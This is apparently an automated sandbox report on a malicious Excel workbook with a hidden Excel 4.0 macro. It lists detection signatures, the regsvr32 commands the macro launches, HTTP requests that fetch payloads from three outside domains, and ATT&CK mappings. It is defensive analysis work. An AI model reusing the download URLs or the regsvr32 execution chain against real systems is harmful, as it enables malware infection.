Loading ...

Play interactive tourEdit tour

Windows Analysis Report art-76929842.xls

Overview

General Information

Sample Name:art-76929842.xls
Analysis ID:502690
MD5:33bcf716b28185aa2eda847e59ee2ae7
SHA1:bb2fa1728615f885c215c7e9accfdbcba123fd0d
SHA256:3dfc7abbc90d50209ca4584cbad952babf00bafc0e37dbbee31b1b184b74f718
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Sigma detected: Regsvr32 Command Line Without DLL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 264 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1444 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2832 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2568 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
art-76929842.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x3aeaa:$s1: Excel
  • 0x3bf57:$s1: Excel
  • 0x34eb:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
art-76929842.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 264, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 1444
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 264, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 1444

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: art-76929842.xlsVirustotal: Detection: 32%Perma Link
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownHTTPS traffic detected: 216.172.187.35:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 101.0.119.207:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 194.233.72.245:443 -> 192.168.2.22:49167 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.172.187.35:443
    Source: global trafficDNS query: name: bostonavenue.org
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.172.187.35:443
    Source: global trafficHTTP traffic detected: GET /zunSJE0UYwbJ/sunise.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bostonavenue.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /0aafNmAW9/suraise.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pmqdermatology.com.auConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /0KICC3zxK2nT/sunraie.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: funzy.idConnection: Keep-Alive
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
    Source: regsvr32.exe, 00000003.00000002.455257697.00000000047E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448425020.0000000004950000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: regsvr32.exe, 00000003.00000002.455257697.00000000047E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448425020.0000000004950000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
    Source: regsvr32.exe, 00000003.00000002.455257697.00000000047E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448425020.0000000004950000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
    Source: regsvr32.exe, 00000003.00000002.455487458.00000000049C7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448650990.0000000004B37000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437826931.0000000004A87000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: regsvr32.exe, 00000003.00000002.455487458.00000000049C7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448650990.0000000004B37000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437826931.0000000004A87000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: regsvr32.exe, 00000003.00000002.454774029.00000000039F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.447980808.0000000003A70000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.436627297.00000000039B0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.454455452.0000000001DB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.447583685.0000000001E20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.436100435.0000000001D50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000003.00000002.455487458.00000000049C7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448650990.0000000004B37000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437826931.0000000004A87000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: regsvr32.exe, 00000003.00000002.455487458.00000000049C7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448650990.0000000004B37000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437826931.0000000004A87000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: regsvr32.exe, 00000003.00000002.454774029.00000000039F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.447980808.0000000003A70000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.436627297.00000000039B0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: regsvr32.exe, 00000003.00000002.455257697.00000000047E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448425020.0000000004950000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: regsvr32.exe, 00000003.00000002.455487458.00000000049C7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448650990.0000000004B37000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437826931.0000000004A87000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: regsvr32.exe, 00000003.00000002.455257697.00000000047E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448425020.0000000004950000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sunise[1].htmJump to behavior
    Source: unknownDNS traffic detected: queries for: bostonavenue.org
    Source: global trafficHTTP traffic detected: GET /zunSJE0UYwbJ/sunise.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bostonavenue.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /0aafNmAW9/suraise.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pmqdermatology.com.auConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /0KICC3zxK2nT/sunraie.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: funzy.idConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 216.172.187.35:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 101.0.119.207:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 194.233.72.245:443 -> 192.168.2.22:49167 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 18 19 I OK I 20 (D PROTECTED VIEW Be careful- files from the 1nterne :cted View.
    Source: Screenshot number: 4Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 18 '9 41' I 20 (D PROTECTED VIEW Be careful- files from the 1nterne :cted View.
    Source: Screenshot number: 8Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
    Source: Document image extraction number: 0Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
    Source: Document image extraction number: 0Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 1Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: Screenshot number: 12Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Screenshot number: 12Screenshot OCR: Enable Content (i) SECURITY WARNING Macros have been disabled. Enable Content If you are using a m
    Source: art-76929842.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: art-76929842.xlsOLE indicator, VBA macros: true
    Source: art-76929842.xlsVirustotal: Detection: 32%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: art-76929842.xlsOLE indicator, Workbook stream: true
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.testJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.testJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.testJump to behavior
    Source: regsvr32.exe, 00000003.00000002.455257697.00000000047E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448425020.0000000004950000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD2E7.tmpJump to behavior
    Source: classification engineClassification label: mal76.expl.winXLS@7/0@3/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 2024Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 1580Thread sleep count: 44 > 30Jump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 284Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 2808Thread sleep count: 51 > 30Jump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 2124Thread sleep time: -60000s >= -30000sJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: art-76929842.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection1Disable or Modify Tools1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer2SIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    art-76929842.xls33%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    bostonavenue.org2%VirustotalBrowse
    pmqdermatology.com.au0%VirustotalBrowse
    funzy.id2%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://bostonavenue.org/zunSJE0UYwbJ/sunise.html0%Avira URL Cloudsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    https://pmqdermatology.com.au/0aafNmAW9/suraise.html0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    https://funzy.id/0KICC3zxK2nT/sunraie.html0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    bostonavenue.org
    216.172.187.35
    truefalseunknown
    pmqdermatology.com.au
    101.0.119.207
    truefalseunknown
    funzy.id
    194.233.72.245
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://bostonavenue.org/zunSJE0UYwbJ/sunise.htmlfalse
    • Avira URL Cloud: safe
    unknown
    https://pmqdermatology.com.au/0aafNmAW9/suraise.htmlfalse
    • Avira URL Cloud: safe
    unknown
    https://funzy.id/0KICC3zxK2nT/sunraie.htmlfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000003.00000002.455487458.00000000049C7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448650990.0000000004B37000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437826931.0000000004A87000.00000002.00020000.sdmpfalse
      high
      http://www.windows.com/pctv.regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpfalse
        high
        http://investor.msn.comregsvr32.exe, 00000003.00000002.455257697.00000000047E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448425020.0000000004950000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.455257697.00000000047E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448425020.0000000004950000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpfalse
            high
            http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.455487458.00000000049C7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448650990.0000000004B37000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437826931.0000000004A87000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.454774029.00000000039F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.447980808.0000000003A70000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.436627297.00000000039B0000.00000002.00020000.sdmpfalse
              high
              http://investor.msn.com/regsvr32.exe, 00000003.00000002.455257697.00000000047E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448425020.0000000004950000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpfalse
                high
                http://www.%s.comPAregsvr32.exe, 00000003.00000002.454774029.00000000039F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.447980808.0000000003A70000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.436627297.00000000039B0000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                low
                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.455487458.00000000049C7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448650990.0000000004B37000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437826931.0000000004A87000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oeregsvr32.exe, 00000003.00000002.455257697.00000000047E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.448425020.0000000004950000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437501666.00000000048A0000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.454455452.0000000001DB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.447583685.0000000001E20000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.436100435.0000000001D50000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  101.0.119.207
                  pmqdermatology.com.auAustralia
                  55803DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUfalse
                  216.172.187.35
                  bostonavenue.orgUnited States
                  46606UNIFIEDLAYER-AS-1USfalse
                  194.233.72.245
                  funzy.idGermany
                  6659NEXINTO-DEfalse

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:502690
                  Start date:14.10.2021
                  Start time:09:50:39
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 46s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:art-76929842.xls
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal76.expl.winXLS@7/0@3/3
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  09:51:25API Interceptor314x Sleep call for process: regsvr32.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  101.0.119.207BWKPI3LiLi.jarGet hashmaliciousBrowse
                  • serendibsourcing.com/credit/printing.pdf
                  BWKPI3LiLi.jarGet hashmaliciousBrowse
                  • serendibsourcing.com/credit/printing.pdf

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUart-1881052385.xlsGet hashmaliciousBrowse
                  • 101.0.113.93
                  art-1881052385.xlsGet hashmaliciousBrowse
                  • 101.0.113.93
                  doc-379851424.xlsGet hashmaliciousBrowse
                  • 101.0.112.4
